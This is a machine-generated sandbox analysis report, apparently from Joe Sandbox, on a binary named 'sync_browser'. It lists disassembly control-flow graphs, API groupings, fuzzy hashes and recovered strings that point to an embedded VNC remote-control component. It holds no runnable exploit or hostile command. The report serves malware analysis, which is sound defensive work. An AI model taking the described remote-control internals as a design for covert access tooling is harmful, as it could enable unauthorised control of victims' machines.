                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF740069F3B
                                                                    • vncservice.cpp : getusername error %d, xrefs: 00007FF74006A04A
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF74006A094
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
                                                                    • String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
                                                                    • API String ID: 3635673080-2232443292
                                                                    • Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                    • Instruction ID: 3d16bed8e3ebe4f073c1936e500eba5a23005048997565f1f91f36dd67fdfb83
                                                                    • Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                    • Instruction Fuzzy Hash: A8414A69F0C542C6EB51BB29F8402B9A3A2BF88348FC44431DA1D867B9DE7DF5458B20

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 556 7ff740009d00-7ff740009d9b call 7ff7400029a0 559 7ff740009d9d 556->559 560 7ff740009db3-7ff740009dc7 OpenSCManagerA 556->560 561 7ff740009da0-7ff740009db1 call 7ff7400b8894 559->561 562 7ff740009dc9-7ff740009dce 560->562 563 7ff740009de0-7ff740009e25 EnumServicesStatusA 560->563 561->560 567 7ff740009dd9-7ff740009ddb 562->567 568 7ff740009dd0-7ff740009dd4 call 7ff7400b7914 562->568 564 7ff740009e2b-7ff740009e36 GetLastError 563->564 565 7ff740009fed-7ff740009ffc CloseServiceHandle 563->565 564->565 569 7ff740009e3c-7ff740009e3f call 7ff7400b71fc 564->569 570 7ff74000a007 565->570 571 7ff740009ffe-7ff74000a002 call 7ff7400b7914 565->571 574 7ff74000a00b-7ff74000a031 call 7ff7400b7220 567->574 568->567 578 7ff740009e44-7ff740009e4e 569->578 570->574 571->570 578->565 580 7ff740009e54-7ff740009e8d EnumServicesStatusA 578->580 581 7ff740009e93-7ff740009e9a 580->581 582 7ff740009fe5-7ff740009fe8 call 7ff7400b78d4 580->582 581->582 584 7ff740009ea0 581->584 582->565 585 7ff740009ea3-7ff740009ea6 584->585 586 7ff740009eac-7ff740009ec5 OpenServiceA 585->586 587 7ff740009fe1 585->587 586->587 588 7ff740009ecb-7ff740009edf QueryServiceConfigA 586->588 587->582 589 7ff740009fc7-7ff740009fdb CloseServiceHandle 588->589 590 7ff740009ee5-7ff740009eee GetLastError 588->590 589->585 589->587 590->589 591 7ff740009ef4-7ff740009f02 call 7ff7400b71fc 590->591 591->589 594 7ff740009f08-7ff740009f1e QueryServiceConfigA 591->594 595 7ff740009fbf-7ff740009fc2 call 7ff7400b78d4 594->595 596 7ff740009f24-7ff740009f8d call 7ff7400029a0 call 7ff740009c80 call 7ff74000a120 594->596 595->589 604 7ff740009faf-7ff740009fb4 596->604 605 7ff740009f8f-7ff740009fa8 call 7ff7400b85e0 596->605 604->595 607 7ff740009fb6-7ff740009fba call 7ff7400b7914 604->607 605->604 607->595
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
                                                                    • String ID:
                                                                    • API String ID: 3151975580-0
                                                                    • Opcode ID: 8382b389006a9dd66acb90cb8f4aaba53788da99cb30eaf76bcb58c2d1a1b507
                                                                    • Instruction ID: edf025801b8a3389141479cdc983be5a2175b750540006622ca0893af1c66625
                                                                    • Opcode Fuzzy Hash: 8382b389006a9dd66acb90cb8f4aaba53788da99cb30eaf76bcb58c2d1a1b507
                                                                    • Instruction Fuzzy Hash: A9914121B08A42C9FB10FBA5E4146ADB3B1BB447A8F804635DE6D57BE9DE38E505C360

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 302 7ff740028590-7ff7400285de call 7ff740003730 305 7ff74002862f-7ff740028639 302->305 306 7ff7400285e0-7ff7400285e9 302->306 309 7ff74002863b-7ff74002863e 305->309 310 7ff740028645-7ff74002864f 305->310 307 7ff7400285eb-7ff74002860e SendMessageA WaitForSingleObject 306->307 308 7ff740028612-7ff74002861c 306->308 307->308 311 7ff740028628 308->311 312 7ff74002861e-7ff740028626 call 7ff740014110 308->312 309->310 313 7ff74002865d-7ff740028664 310->313 314 7ff740028651-7ff740028656 call 7ff7400b8bf4 310->314 311->305 312->311 316 7ff74002869b-7ff7400286a5 313->316 317 7ff740028666-7ff740028688 call 7ff740003730 313->317 314->313 318 7ff7400286a7-7ff7400286ac call 7ff7400b78d4 316->318 319 7ff7400286b3-7ff7400286bd 316->319 326 7ff74002868a-7ff74002868d 317->326 327 7ff740028694 317->327 318->319 324 7ff7400286cb-7ff7400286d5 319->324 325 7ff7400286bf-7ff7400286c4 call 7ff7400b78d4 319->325 330 7ff7400286d7 call 7ff7400b78d4 324->330 331 7ff7400286dc-7ff7400286e6 324->331 325->324 326->327 327->316 330->331 332 7ff7400286e8 call 7ff7400b78d4 331->332 333 7ff7400286ed-7ff7400286f7 331->333 332->333 337 7ff7400286f9 call 7ff7400b78d4 333->337 338 7ff7400286fe-7ff740028704 333->338 337->338 340 7ff740028757-7ff740028761 338->340 341 7ff740028706-7ff74002870d 338->341 342 7ff740028768-7ff740028772 340->342 343 7ff740028763 call 7ff7400b8bf4 340->343 341->340 344 7ff74002870f-7ff740028719 341->344 346 7ff74002877a-7ff740028782 342->346 347 7ff740028774-7ff740028779 call 7ff7400b8bf4 342->347 343->342 348 7ff74002871b-7ff740028723 344->348 349 7ff740028736-7ff74002873e call 7ff74006a220 344->349 351 7ff740028790-7ff7400287b3 346->351 352 7ff740028784-7ff74002878b call 7ff7400b7914 346->352 347->346 348->340 361 7ff740028725-7ff740028734 348->361 349->340 360 7ff740028740-7ff740028751 SendMessageA 349->360 358 7ff7400287bc-7ff7400287c3 call 7ff7400b78d4 351->358 359 7ff7400287b5-7ff7400287bb FreeLibrary 351->359 352->351 363 7ff7400287c8-7ff7400287dc call 7ff7400b78d4 358->363 359->358 360->340 361->340 361->349 367 7ff7400287ea-7ff740028896 DeleteObject call 7ff7400b8bf4 DeleteObject call 7ff7400b8bf4 DeleteObject call 7ff7400b8bf4 DeleteObject call 7ff7400b8bf4 363->367 368 7ff7400287de-7ff7400287e5 call 7ff7400b7914 363->368 368->367
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
                                                                    • String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
                                                                    • API String ID: 2172171234-2418058073
                                                                    • Opcode ID: 7d6e0222f0b164888ec2c64f76faef887037f09de436063cfbd08819724c29b1
                                                                    • Instruction ID: be7976e512f5a96f671ad88ffdbd7442d84fbba3f74762a3b312e7a30af78046
                                                                    • Opcode Fuzzy Hash: 7d6e0222f0b164888ec2c64f76faef887037f09de436063cfbd08819724c29b1
                                                                    • Instruction Fuzzy Hash: AF81E835A0EA81C5EB64BF61D8547B9A360EF84B94F980135DE1D4B7A9CF39E451C320

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1935883720-0
                                                                    • Opcode ID: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
                                                                    • Instruction ID: 8441d5cf5121afce25809bc6e909273e33dc77c1fb1a93a702b3e4dfea11d779
                                                                    • Opcode Fuzzy Hash: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
                                                                    • Instruction Fuzzy Hash: 29618131B0CA42C2EB10FB65E45477AA3A1EF89BA4F958131DA5D47BA8DF3CE445C360

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
                                                                    • String ID:
                                                                    • API String ID: 772457954-0
                                                                    • Opcode ID: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
                                                                    • Instruction ID: 46bb52ce53ac9750e48f296e7ba1956d8b74037deaa75dbe4b2f1fb9862a79eb
                                                                    • Opcode Fuzzy Hash: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
                                                                    • Instruction Fuzzy Hash: 6F613A36A1CB02C6EB41BF65A844669A7A0FF45B84F904135DA5E43BB9DF3CF449C720

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 487 7ff74001f940-7ff74001f979 488 7ff74001f980-7ff74001f9ab 487->488 489 7ff74001fb19-7ff74001fb25 488->489 490 7ff74001f9b1-7ff74001f9cc call 7ff7400b7c50 488->490 491 7ff74001fb29-7ff74001fb42 call 7ff7400b7d30 489->491 496 7ff74001f9cf 490->496 497 7ff74001fb50-7ff74001fb69 call 7ff7400b7d30 491->497 498 7ff74001fb44 491->498 499 7ff74001f9d1-7ff74001f9d3 496->499 501 7ff74001fb49-7ff74001fb4b 497->501 507 7ff74001fb6b-7ff74001fb95 call 7ff7400b8bbc 497->507 498->488 499->501 502 7ff74001f9d9-7ff74001f9e5 499->502 506 7ff74001fc43-7ff74001fc6d call 7ff7400b7220 501->506 504 7ff74001f9eb-7ff74001f9f4 502->504 505 7ff74001fae6-7ff74001fafc SleepEx 502->505 508 7ff74001faaa 504->508 509 7ff74001f9fa-7ff74001fa02 504->509 514 7ff74001fb02-7ff74001fb04 505->514 507->501 522 7ff74001fb97-7ff74001fbf8 call 7ff740003730 507->522 515 7ff74001faaf-7ff74001fab8 call 7ff74006d1f0 508->515 509->508 512 7ff74001fa08-7ff74001fa0f 509->512 517 7ff74001fa39-7ff74001fa44 512->517 518 7ff74001fa11-7ff74001fa34 512->518 519 7ff74001fb12-7ff74001fb14 514->519 520 7ff74001fb06-7ff74001fb0d 514->520 526 7ff74001fabd-7ff74001fac8 515->526 524 7ff74001fa5e-7ff74001fa9e EnterCriticalSection LeaveCriticalSection 517->524 525 7ff74001fa46-7ff74001fa5c 517->525 523 7ff74001faca-7ff74001fae4 call 7ff74006d890 518->523 519->499 520->496 536 7ff74001fbfa-7ff74001fc06 522->536 537 7ff74001fc3e 522->537 523->491 523->505 533 7ff74001faa4-7ff74001faa8 524->533 525->533 526->505 526->523 533->515 536->537 538 7ff74001fc08-7ff74001fc1d 536->538 537->506 538->537 540 7ff74001fc1f-7ff74001fc2c 538->540 540->537 541 7ff74001fc2e-7ff74001fc3a 540->541 541->537
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
                                                                    • String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
                                                                    • API String ID: 958158500-3765181313
                                                                    • Opcode ID: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
                                                                    • Instruction ID: 3dac54e41cd15d2bc44ccccbea3f98740b401278ca28d9229d11dcd9dab18399
                                                                    • Opcode Fuzzy Hash: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
                                                                    • Instruction Fuzzy Hash: AB91C06260CB86C6EB60EB15E4587BAB7A4FB84B84F800136DA4E477B8DF3DE445C710

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
                                                                    • String ID: ?
                                                                    • API String ID: 2900023865-1684325040
                                                                    • Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                    • Instruction ID: 92a6fb67eea2d901698e3085b6edc81e328d8079177c6d8898b578d1688fb235
                                                                    • Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                    • Instruction Fuzzy Hash: F4311C3660DB82C5E760AF21F84436AB7A9FB89784F904035DA8D47B69DF3DE055CB20

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateRect$AddressLibraryLoadProcmalloc
                                                                    • String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
                                                                    • API String ID: 1369618222-3178290357
                                                                    • Opcode ID: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
                                                                    • Instruction ID: 999dd6d4b719d72252ce9b00570fb7b68718dd5904b076575b986a7ec0b70bd2
                                                                    • Opcode Fuzzy Hash: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
                                                                    • Instruction Fuzzy Hash: 2BB12A32629BD1D6E348DF24EA443DDB7A8F744B44F54422AE3A807BA1CF7A6076C750

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
                                                                    • String ID:
                                                                    • API String ID: 1366308849-0
                                                                    • Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                    • Instruction ID: f2c78a6abd3edc9624f8092e900d09bce478d86422ee2bbb8adc6e1fe31ab503
                                                                    • Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                    • Instruction Fuzzy Hash: AC313A32A0C642C6EB14BF24E4545A9B3A1FF85754FA00236E69D42BBDDF3CE449CB20

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
                                                                    • String ID:
                                                                    • API String ID: 2120259006-0
                                                                    • Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                    • Instruction ID: 4e51edb8645c5403758dde6fd577ccd6dd74e48cb2ad2ecfe4f7b0487d104321
                                                                    • Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                    • Instruction Fuzzy Hash: 54513472608B81DEE724DF30D484799B7A4FB4870CF404526EB5C87B58DB78E6A5CB60

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
